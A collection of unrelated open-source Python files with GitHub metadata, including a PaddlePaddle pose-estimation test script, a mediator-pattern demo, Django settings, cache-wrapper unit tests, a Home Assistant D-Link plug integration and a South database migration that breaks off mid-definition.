import paddle.fluid as fluid
import paddle.fluid.layers as layers
from lib import pose_resnet
from utils.transforms import flip_back
from utils.utility import *
parser = argparse.ArgumentParser(description=__doc__)
add_arg = functools.partial(add_arguments, argparser=parser)
# yapf: disable
add_arg('batch_size', int, 32, "Minibatch size.")
add_arg('dataset', str, 'mpii', "Dataset")
add_arg('use_gpu', bool, True, "Whether to use GPU or not.")
add_arg('kp_dim', int, 16, "Class number.")
add_arg('model_save_dir', str, "output", "Model save directory")
add_arg('with_mem_opt', bool, True, "Whether to use memory optimization or not.")
add_arg('checkpoint', str, None, "Whether to resume checkpoint.")
add_arg('flip_test', bool, True, "Flip test")
add_arg('shift_heatmap', bool, True, "Shift heatmap")
# yapf: enable
def test(args):
import lib.mpii_reader as reader
if args.dataset == 'coco':
IMAGE_SIZE = [288, 384]
FLIP_PAIRS = [[1, 2], [3, 4], [5, 6], [7, 8], [9, 10], [11, 12], [13, 14], [15, 16]]
args.kp_dim = 17
elif args.dataset == 'mpii':
IMAGE_SIZE = [384, 384]
FLIP_PAIRS = [[0, 5], [1, 4], [2, 3], [10, 15], [11, 14], [12, 13]]
args.kp_dim = 16
else:
raise ValueError('The dataset {} is not supported yet.'.format(args.dataset))
print_arguments(args)
# Image and target
image = layers.data(name='image', shape=[3, IMAGE_SIZE[1], IMAGE_SIZE[0]], dtype='float32')
file_id = layers.data(name='file_id', shape=[1,], dtype='int')
# Build model
model = pose_resnet.ResNet(layers=50, kps_num=args.kp_dim, test_mode=True)
# Output
output = model.net(input=image, target=None, target_weight=None)
if args.with_mem_opt:
fluid.memory_optimize(fluid.default_main_program(),
skip_opt_set=[output.name])
place = fluid.CUDAPlace(0) if args.use_gpu else fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
if args.checkpoint is not None:
fluid.io.load_persistables(exe, args.checkpoint)
# Dataloader
test_reader = paddle.batch(reader.test(), batch_size=args.batch_size)
feeder = fluid.DataFeeder(place=place, feed_list=[image, file_id])
test_exe = fluid.ParallelExecutor(
use_cuda=True if args.use_gpu else False,
main_program=fluid.default_main_program().clone(for_test=True),
loss_name=None)
fetch_list = [image.name, output.name]
for batch_id, data in enumerate(test_reader()):
num_images = len(data)
file_ids = []
for i in range(num_images):
file_ids.append(data[i][1])
input_image, out_heatmaps = test_exe.run(
fetch_list=fetch_list,
feed=feeder.feed(data))
if args.flip_test:
# Flip all the images in a same batch
data_fliped = []
for i in range(num_images):
data_fliped.append((
data[i][0][:, :, ::-1],
data[i][1]))
# Inference again
_, output_flipped = test_exe.run(
fetch_list=fetch_list,
feed=feeder.feed(data_fliped))
# Flip back
output_flipped = flip_back(output_flipped, FLIP_PAIRS)
# Feature is not aligned, shift flipped heatmap for higher accuracy
if args.shift_heatmap:
output_flipped[:, :, :, 1:] = \
output_flipped.copy()[:, :, :, 0:-1]
# Aggregate
out_heatmaps = (out_heatmaps + output_flipped) * 0.5
save_predict_results(input_image, out_heatmaps, file_ids, fold_name='results')
if __name__ == '__main__':
args = parser.parse_args()
test(args)
|
{
"content_hash": "3a2e76bb80dfa432f4e353da7acc4cf0",
"timestamp": "",
"source": "github",
"line_count": 114,
"max_line_length": 100,
"avg_line_length": 36.219298245614034,
"alnum_prop": 0.5616372002906272,
"repo_name": "kuke/models",
"id": "aebbe517133fe589bac819dd337c03d264136cc2",
"size": "4797",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "fluid/PaddleCV/human_pose_estimation/test.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C++",
"bytes": "15149"
},
{
"name": "Perl",
"bytes": "2072"
},
{
"name": "Python",
"bytes": "2905007"
},
{
"name": "Shell",
"bytes": "2506531"
}
],
"symlink_target": ""
}
|
import collections
def main():
form = Form()
test_user_interaction_with(form)
class Form:
def __init__(self):
self.create_widgets()
self.create_mediator()
def create_widgets(self):
self.nameText = Text()
self.emailText = Text()
self.okButton = Button("OK")
self.cancelButton = Button("Cancel")
def create_mediator(self):
self.mediator = Mediator(((self.nameText, self.update_ui),
(self.emailText, self.update_ui),
(self.okButton, self.clicked),
(self.cancelButton, self.clicked)))
self.update_ui()
def update_ui(self, widget=None):
self.okButton.enabled = (bool(self.nameText.text) and
bool(self.emailText.text))
def clicked(self, widget):
if widget == self.okButton:
print("OK")
elif widget == self.cancelButton:
print("Cancel")
class Mediator:
def __init__(self, widgetCallablePairs):
self.callablesForWidget = collections.defaultdict(list)
for widget, caller in widgetCallablePairs:
self.callablesForWidget[widget].append(caller)
widget.mediator = self
def on_change(self, widget):
callables = self.callablesForWidget.get(widget)
if callables is not None:
for caller in callables:
caller(widget)
else:
raise AttributeError("No on_change() method registered for {}"
.format(widget))
def mediated(Class):
setattr(Class, "mediator", None)
def on_change(self):
if self.mediator is not None:
self.mediator.on_change(self)
setattr(Class, "on_change", on_change)
return Class
@mediated
class Button:
def __init__(self, text=""):
super().__init__()
self.enabled = True
self.text = text
def click(self):
if self.enabled:
self.on_change()
def __str__(self):
return "Button({!r}) {}".format(self.text,
"enabled" if self.enabled else "disabled")
@mediated
class Text:
def __init__(self, text=""):
super().__init__()
self.__text = text
@property
def text(self):
return self.__text
@text.setter
def text(self, text):
if self.text != text:
self.__text = text
self.on_change()
def __str__(self):
return "Text({!r})".format(self.text)
def test_user_interaction_with(form):
form.okButton.click() # Ignored because it is disabled
print(form.okButton.enabled) # False
form.nameText.text = "Fred"
print(form.okButton.enabled) # False
form.emailText.text = "fred@bloggers.com"
print(form.okButton.enabled) # True
form.okButton.click() # OK
form.emailText.text = ""
print(form.okButton.enabled) # False
form.cancelButton.click() # Cancel
if __name__ == "__main__":
main()
|
{
"content_hash": "308f81676a43f91a4e4c7f93ce536ce7",
"timestamp": "",
"source": "github",
"line_count": 128,
"max_line_length": 74,
"avg_line_length": 23.7421875,
"alnum_prop": 0.5656465942744324,
"repo_name": "iceihehe/pipeg",
"id": "6629bab811ff1edbdfd6033d96f4b80241a7e740",
"size": "3648",
"binary": false,
"copies": "4",
"ref": "refs/heads/main",
"path": "python3/mediator1d.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "721392"
}
],
"symlink_target": ""
}
|
"""Illustrates the problem where a finally block raises an exception. This
can mask the original exception that caused the problem in the first place.
The user sees the ExceptionCleanUp but not the ExceptionNormal which was masked
(in Python 2.x). Python 3 reports both exceptions.
Created on Aug 19, 2011
@author: paulross
"""
class ExceptionNormal(Exception):
pass
class ExceptionCleanUp(Exception):
pass
def a():
b()
def b():
try:
c()
finally:
print(' b(): finally: This code is always executed.')
cleanUp()
def c():
print('Raising "ExceptionNormal" from c()')
raise ExceptionNormal('ExceptionNormal raised from function c()')
def cleanUp():
raise ExceptionCleanUp('Can not clean up')
def main():
a()
return 0
if __name__ == '__main__':
main()
|
{
"content_hash": "923206d747552512efa845d8c4476faf",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 79,
"avg_line_length": 20.775,
"alnum_prop": 0.6666666666666666,
"repo_name": "manahl/PythonTrainingExercises",
"id": "b4a7885783bccbec5418dd30a93f80caf7e4d796",
"size": "853",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "Beginners/ExampleExceptions/C_finally_prob.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Python",
"bytes": "285088"
}
],
"symlink_target": ""
}
|
"""
Django settings for emergencyTransport project.
For more information on this file, see
https://docs.djangoproject.com/en/1.6/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.6/ref/settings/
"""
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
import os
BASE_DIR = os.path.dirname(os.path.dirname(__file__))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'Secret key needed'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
TEMPLATE_DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = (
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'datetimewidget',
'bootstrap3',
'background_task',
'RouteFinder',
'CustomGeoposition',
)
MIDDLEWARE_CLASSES = (
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
)
ROOT_URLCONF = 'emergencyTransport.urls'
WSGI_APPLICATION = 'emergencyTransport.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.6/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Internationalization
# https://docs.djangoproject.com/en/1.6/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
#Geoposition App settings
CUSTOMGEOPOSITION_MAP_OPTIONS = {
'minZoom': 10,
'maxZoom': 15,
'center': {'lat': 51.483125, 'lng': -3.178261}
}
CUSTOMGEOPOSITION_MAP_WIDGET_HEIGHT = 240
CUSTOMGEOPOSITION_MARKER_OPTIONS = {}
CUSTOMGEOPOSITION_API_KEY = 'Get an API key from Google'
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.6/howto/static-files/
STATIC_URL = '/static/'
#STATIC_ROOT = '/static/'
TEMPLATE_DIRS = [os.path.join(BASE_DIR, 'templates')]
#URL of the login page.
LOGIN_URL = '/login/'
|
{
"content_hash": "255c36f66da1824dd012b5bd77fd7ff2",
"timestamp": "",
"source": "github",
"line_count": 105,
"max_line_length": 71,
"avg_line_length": 24.276190476190475,
"alnum_prop": 0.7175362887406826,
"repo_name": "MatthewGWilliams/Staff-Transport",
"id": "06ab4c787a3bc8c3e7f58634eb5cf6a8721273e3",
"size": "2549",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "emergencyTransport/emergencyTransport/settings.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "190554"
},
{
"name": "CSS",
"bytes": "1163"
},
{
"name": "JavaScript",
"bytes": "7015"
},
{
"name": "Python",
"bytes": "57863"
}
],
"symlink_target": ""
}
|
from . import parentpath
import unittest
from cacheman.cachewrap import CacheWrap, NonPersistentCache, PersistentCache
from .common import CacheCommonAsserter
class CacheWrapTest(CacheCommonAsserter, unittest.TestCase):
def __init__(self, *args, **kwargs):
CacheCommonAsserter.__init__(self)
unittest.TestCase.__init__(self, *args, **kwargs)
def assert_registrations_blank(self, cache, registration_names):
for reg in registration_names:
self.assertIsNone(getattr(cache, reg))
def fake_registration(self, *args, **kwargs):
return 'Some custom function'
def test_self_registering_cache(self):
for call_name in CacheWrap.CALLBACK_NAMES:
cache_name = 'foo_' + call_name
cache = CacheWrap(cache_name, cache_manager=self.manager,
**{ call_name: self.fake_registration })
registers = [reg for reg in CacheWrap.CALLBACK_NAMES if reg != call_name]
self.assert_registrations_blank(cache, registers)
callback = getattr(cache, call_name)
self.assertIsNotNone(callback)
self.assertEqual(callback(), self.fake_registration())
def test_non_persistent_cache_wrap(self):
cache_name = 'cache_wrap'
cache = NonPersistentCache(cache_name, cache_manager=self.manager, contents={})
cache['foo'] = 'bar'
self.assertEqual(cache['foo'], 'bar')
cache.save() # No-op
self.check_cache_gone(cache_name)
cache.load() # Clear
self.check_cache_gone(cache_name)
self.assertNotIn('foo', cache)
def test_persistent_cache_wrap(self):
cache_name = self.check_cache_gone('persistent')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={})
cache['foo'] = 'bar'
cache.save()
self.check_cache(cache_name, True)
cache.load() # Reload
self.check_cache(cache_name, True)
self.assertEqual(cache['foo'], 'bar')
def test_content_driven_cache_wrap(self):
cache_name = self.check_cache_gone('content')
# Pass a non-empty list as content
cache = PersistentCache(cache_name, cache_manager=self.manager, contents=[''],
builder=lambda *args: [])
cache[0] = 'foo'
cache.append('bar')
cache.save()
cache.load()
self.assertTrue(isinstance(cache, PersistentCache))
self.assertTrue(isinstance(cache.contents, list))
self.check_cache(cache_name, True)
self.assertEqual(cache[0], 'foo')
self.assertEqual(cache[1], 'bar')
cache.invalidate_and_rebuild()
self.assertTrue(isinstance(cache, PersistentCache))
self.assertTrue(isinstance(cache.contents, list))
self.assert_contents_equal(cache, [])
def test_load_on_init(self):
cache_name = self.check_cache_gone('load_init')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.save()
cache = PersistentCache(cache_name, cache_manager=self.manager)
self.assertEqual(cache['foo'], 'bar')
def test_build_on_init(self):
cache_name = self.check_cache_gone('built')
cache = NonPersistentCache(cache_name, cache_manager=self.manager, loader=None,
builder=lambda *args: [])
self.assertTrue(isinstance(cache.contents, list))
self.assert_contents_equal(cache, [])
def test_delete_save(self):
cache_name = self.check_cache_gone('deleted')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.__del__() # To avoid lazy deletion calls/reference counts
self.check_cache(cache_name, True)
cache = PersistentCache(cache_name, cache_manager=self.manager)
self.assertEqual(cache['foo'], 'bar')
def test_scoped_cache(self):
cache_name = self.check_cache_gone('scoped')
with PersistentCache(cache_name, cache_manager=self.manager) as cache:
cache['foo'] = 'bar'
self.check_cache(cache_name, True)
# Should have saved contents in last scoping
with PersistentCache(cache_name, cache_manager=self.manager) as cache:
self.assertEqual(cache['foo'], 'bar')
def test_contains(self):
cache_name = self.check_cache_gone('contains')
cache = NonPersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
self.assertTrue('foo' in cache)
self.assertFalse('foo2' in cache)
def test_save_and_load(self):
cache_name = self.check_cache_gone('save_load')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.save()
cache.contents = {}
self.assert_contents_equal(cache, {})
cache.load()
self.assertEqual(cache['foo'], 'bar')
def test_invalidate(self):
cache_name = self.check_cache_gone('invalidate')
cache = PersistentCache(cache_name, cache_manager=self.manager)
cache['foo'] = 'bar'
cache.save()
cache['baz'] = 'bar'
cache.invalidate() # Should reload
self.assertEqual(cache['foo'], 'bar')
self.assertNotIn('baz', cache)
def test_delete_saved(self):
cache_name = self.check_cache_gone('delete_saved')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.delete_saved_content()
self.check_cache_gone(cache_name)
self.assertEqual(cache['foo'], 'bar') # Shouldn't delete memory
cache.load()
self.assertIsNone(cache.contents) # No content to load
cache.load_or_build()
self.assert_contents_equal(cache, {})
def test_invalidate_and_rebuild(self):
cache_name = self.check_cache_gone('invalidate_rebuild')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' })
cache.save()
cache.invalidate_and_rebuild()
self.assert_contents_equal(cache, {})
cache.load() # Saved content should get replaced
self.assert_contents_equal(cache, {})
def test_load_or_build(self):
cache_name = self.check_cache_gone('load_build')
cache = CacheWrap(cache_name, cache_manager=self.manager, loader=lambda *args: ['loaded'],
builder=lambda *args: ['built'])
self.assert_contents_equal(cache, ['loaded'])
cache.load_or_build()
self.assert_contents_equal(cache, ['loaded'])
cache.loader = None
cache.load_or_build()
self.assert_contents_equal(cache, ['built'])
def test_validation(self):
cache_name = self.check_cache_gone('validation')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
validator=lambda *args: False, builder=lambda *args: ['built'])
cache.save()
cache.load_or_build() # Invalid load, force rebuild
self.assert_contents_equal(cache, ['built'])
cache[0] = 'changed'
cache.save()
cache.validator = lambda *args: True
cache.load()
self.assert_contents_equal(cache, ['changed'])
# Raising an exception in validator should invalidate the cache
cache.validator = lambda *args: args['not legal']
cache.load()
self.assert_contents_equal(cache, None)
def test_dependents(self):
dependent_cache_name = self.check_cache_gone('dependent')
dependent_cache = PersistentCache(dependent_cache_name, cache_manager=self.manager)
parent_cache_name = self.check_cache_gone('parent')
parent_cache = PersistentCache(parent_cache_name, cache_manager=self.manager, dependents=[dependent_cache])
dependent_cache['foo'] = 'bar'
parent_cache.save(True)
dependent_cache['foo'] = 'saved'
parent_cache.load(True)
self.assertEqual(dependent_cache['foo'], 'bar')
dependent_cache['foo'] = 'invalid'
parent_cache.invalidate(True)
self.assertEqual(dependent_cache['foo'], 'bar')
parent_cache.delete_saved_content(True)
parent_cache.load(True)
self.assertIsNone(dependent_cache.contents)
parent_cache.load_or_build(True)
self.assertDictEqual(dependent_cache.contents, {})
dependent_cache['foo'] = 'bar'
dependent_cache.save()
parent_cache.invalidate_and_rebuild(True)
self.assertDictEqual(dependent_cache.contents, {})
def test_pre_processor(self):
cache_name = self.check_cache_gone('pre_process')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
pre_processor=lambda c: { 'foo2': c.get('foo', 'missing') })
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.save()
# Preprocessor should have applied to save, but not cache
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.load() # Load the preprocessor changes
self.assert_contents_equal(cache, { 'foo2': 'bar' })
def test_post_processor(self):
cache_name = self.check_cache_gone('post_process')
cache = PersistentCache(cache_name, cache_manager=self.manager, contents={ 'foo': 'bar' },
post_processor=lambda c: { 'foo2': c.get('foo', 'missing') })
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.save()
# Postprocessor should not have applied to save or cache
self.assert_contents_equal(cache, { 'foo': 'bar' })
cache.load() # Load and apply postprocessor changes
self.assert_contents_equal(cache, { 'foo2': 'bar' })
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "45a6a43d77533e8765b0ff04423c8e4d",
"timestamp": "",
"source": "github",
"line_count": 255,
"max_line_length": 115,
"avg_line_length": 39.627450980392155,
"alnum_prop": 0.6120732310737259,
"repo_name": "OpenGov/py_cache_manager",
"id": "6b655fdbfefd50101aa7f113eb4779dc565c227e",
"size": "10142",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tests/wrap_tests.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Python",
"bytes": "81551"
}
],
"symlink_target": ""
}
|
"""Support for D-Link W215 smart switch."""
from datetime import timedelta
import logging
import urllib
from pyW215.pyW215 import SmartPlug
import voluptuous as vol
from homeassistant.components.switch import PLATFORM_SCHEMA, SwitchDevice
from homeassistant.const import (
ATTR_TEMPERATURE,
CONF_HOST,
CONF_NAME,
CONF_PASSWORD,
CONF_USERNAME,
TEMP_CELSIUS,
)
import homeassistant.helpers.config_validation as cv
from homeassistant.util import dt as dt_util
_LOGGER = logging.getLogger(__name__)
ATTR_TOTAL_CONSUMPTION = "total_consumption"
CONF_USE_LEGACY_PROTOCOL = "use_legacy_protocol"
DEFAULT_NAME = "D-Link Smart Plug W215"
DEFAULT_PASSWORD = ""
DEFAULT_USERNAME = "admin"
SCAN_INTERVAL = timedelta(minutes=2)
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend(
{
vol.Required(CONF_HOST): cv.string,
vol.Required(CONF_PASSWORD, default=DEFAULT_PASSWORD): cv.string,
vol.Required(CONF_USERNAME, default=DEFAULT_USERNAME): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
vol.Optional(CONF_USE_LEGACY_PROTOCOL, default=False): cv.boolean,
}
)
def setup_platform(hass, config, add_entities, discovery_info=None):
"""Set up a D-Link Smart Plug."""
host = config.get(CONF_HOST)
username = config.get(CONF_USERNAME)
password = config.get(CONF_PASSWORD)
use_legacy_protocol = config.get(CONF_USE_LEGACY_PROTOCOL)
name = config.get(CONF_NAME)
smartplug = SmartPlug(host, password, username, use_legacy_protocol)
data = SmartPlugData(smartplug)
add_entities([SmartPlugSwitch(hass, data, name)], True)
class SmartPlugSwitch(SwitchDevice):
"""Representation of a D-Link Smart Plug switch."""
def __init__(self, hass, data, name):
"""Initialize the switch."""
self.units = hass.config.units
self.data = data
self._name = name
@property
def name(self):
"""Return the name of the Smart Plug."""
return self._name
@property
def device_state_attributes(self):
"""Return the state attributes of the device."""
try:
ui_temp = self.units.temperature(int(self.data.temperature), TEMP_CELSIUS)
temperature = ui_temp
except (ValueError, TypeError):
temperature = None
try:
total_consumption = float(self.data.total_consumption)
except (ValueError, TypeError):
total_consumption = None
attrs = {
ATTR_TOTAL_CONSUMPTION: total_consumption,
ATTR_TEMPERATURE: temperature,
}
return attrs
@property
def current_power_w(self):
"""Return the current power usage in Watt."""
try:
return float(self.data.current_consumption)
except (ValueError, TypeError):
return None
@property
def is_on(self):
"""Return true if switch is on."""
return self.data.state == "ON"
def turn_on(self, **kwargs):
"""Turn the switch on."""
self.data.smartplug.state = "ON"
def turn_off(self, **kwargs):
"""Turn the switch off."""
self.data.smartplug.state = "OFF"
def update(self):
"""Get the latest data from the smart plug and updates the states."""
self.data.update()
@property
def available(self) -> bool:
"""Return True if entity is available."""
return self.data.available
class SmartPlugData:
"""Get the latest data from smart plug."""
def __init__(self, smartplug):
"""Initialize the data object."""
self.smartplug = smartplug
self.state = None
self.temperature = None
self.current_consumption = None
self.total_consumption = None
self.available = False
self._n_tried = 0
self._last_tried = None
def update(self):
"""Get the latest data from the smart plug."""
if self._last_tried is not None:
last_try_s = (dt_util.now() - self._last_tried).total_seconds() / 60
retry_seconds = min(self._n_tried * 2, 10) - last_try_s
if self._n_tried > 0 and retry_seconds > 0:
_LOGGER.warning("Waiting %s s to retry", retry_seconds)
return
_state = "unknown"
try:
self._last_tried = dt_util.now()
_state = self.smartplug.state
except urllib.error.HTTPError:
_LOGGER.error("D-Link connection problem")
if _state == "unknown":
self._n_tried += 1
self.available = False
_LOGGER.warning("Failed to connect to D-Link switch")
return
self.state = _state
self.available = True
self.temperature = self.smartplug.temperature
self.current_consumption = self.smartplug.current_consumption
self.total_consumption = self.smartplug.total_consumption
self._n_tried = 0
|
{
"content_hash": "bc2b3d1bedd1006c8b815b2125f0dfc1",
"timestamp": "",
"source": "github",
"line_count": 167,
"max_line_length": 86,
"avg_line_length": 29.748502994011975,
"alnum_prop": 0.6217793880837359,
"repo_name": "postlund/home-assistant",
"id": "7fa391e8060619177b9a429f0dfff9ffbcb66921",
"size": "4968",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "homeassistant/components/dlink/switch.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "20215859"
},
{
"name": "Shell",
"bytes": "6663"
}
],
"symlink_target": ""
}
|
import os
import sys
if __name__ == "__main__":
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "alpha.settings")
from django.core.management import execute_from_command_line
execute_from_command_line(sys.argv)
|
{
"content_hash": "52317a2eabbc1d93c7b08d92503fe488",
"timestamp": "",
"source": "github",
"line_count": 9,
"max_line_length": 69,
"avg_line_length": 25.11111111111111,
"alnum_prop": 0.7079646017699115,
"repo_name": "appdotnet/alpha",
"id": "814bc1d89a57d2d1ebc01659d713e0c5cd6c98b0",
"size": "248",
"binary": false,
"copies": "3",
"ref": "refs/heads/master",
"path": "manage.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "517287"
},
{
"name": "JavaScript",
"bytes": "314082"
},
{
"name": "Python",
"bytes": "223885"
}
],
"symlink_target": ""
}
|
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
from oscar.core.compat import AUTH_USER_MODEL, AUTH_USER_MODEL_NAME
class Migration(SchemaMigration):
def forwards(self, orm):
db.rename_column(u'order_order', 'basket_alt_id', 'basket_id')
def backwards(self, orm):
db.rename_column(u'order_order', 'basket_id', 'basket_alt_id')
models = {
u'address.country': {
'Meta': {'ordering': "('-display_order', 'name')", 'object_name': 'Country'},
'display_order': ('django.db.models.fields.PositiveSmallIntegerField', [], {'default': '0', 'db_index': 'True'}),
'is_shipping_country': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'db_index': 'True'}),
'iso_3166_1_a2': ('django.db.models.fields.CharField', [], {'max_length': '2', 'primary_key': 'True'}),
'iso_3166_1_a3': ('django.db.models.fields.CharField', [], {'max_length': '3', 'null': 'True', 'db_index': 'True'}),
'iso_3166_1_numeric': ('django.db.models.fields.PositiveSmallIntegerField', [], {'null': 'True', 'db_index': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'printable_name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'auth.group': {
'Meta': {'object_name': 'Group'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': u"orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
u'auth.permission': {
'Meta': {'ordering': "(u'content_type__app_label', u'content_type__model', u'codename')", 'unique_together': "((u'content_type', u'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': u"orm['contenttypes.ContentType']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
AUTH_USER_MODEL: {
'Meta': {'object_name': AUTH_USER_MODEL_NAME},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Group']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'related_name': "u'user_set'", 'blank': 'True', 'to': u"orm['auth.Permission']"}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
u'basket.basket': {
'Meta': {'object_name': 'Basket'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'date_merged': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'date_submitted': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'baskets'", 'null': 'True', 'to': u"orm['{}']".format(AUTH_USER_MODEL)}),
'status': ('django.db.models.fields.CharField', [], {'default': "'Open'", 'max_length': '128'}),
'vouchers': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': u"orm['voucher.Voucher']", 'null': 'True', 'blank': 'True'})
},
u'catalogue.attributeentity': {
'Meta': {'object_name': 'AttributeEntity'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'}),
'type': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'entities'", 'to': u"orm['catalogue.AttributeEntityType']"})
},
u'catalogue.attributeentitytype': {
'Meta': {'object_name': 'AttributeEntityType'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255', 'blank': 'True'})
},
u'catalogue.attributeoption': {
'Meta': {'object_name': 'AttributeOption'},
'group': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'options'", 'to': u"orm['catalogue.AttributeOptionGroup']"}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'option': ('django.db.models.fields.CharField', [], {'max_length': '255'})
},
u'catalogue.attributeoptiongroup': {
'Meta': {'object_name': 'AttributeOptionGroup'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '128'})
},
u'catalogue.category': {
'Meta': {'ordering': "['full_name']", 'object_name': 'Category'},
'depth': ('django.db.models.fields.PositiveIntegerField', [], {}),
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'full_name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'image': ('django.db.models.fields.files.ImageField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255', 'db_index': 'True'}),
'numchild': ('django.db.models.fields.PositiveIntegerField', [], {'default': '0'}),
'path': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '255'}),
'slug': ('django.db.models.fields.SlugField', [], {'max_length': '255'})
},
u'catalogue.option': {
'Meta': {'object_name': 'Option'},
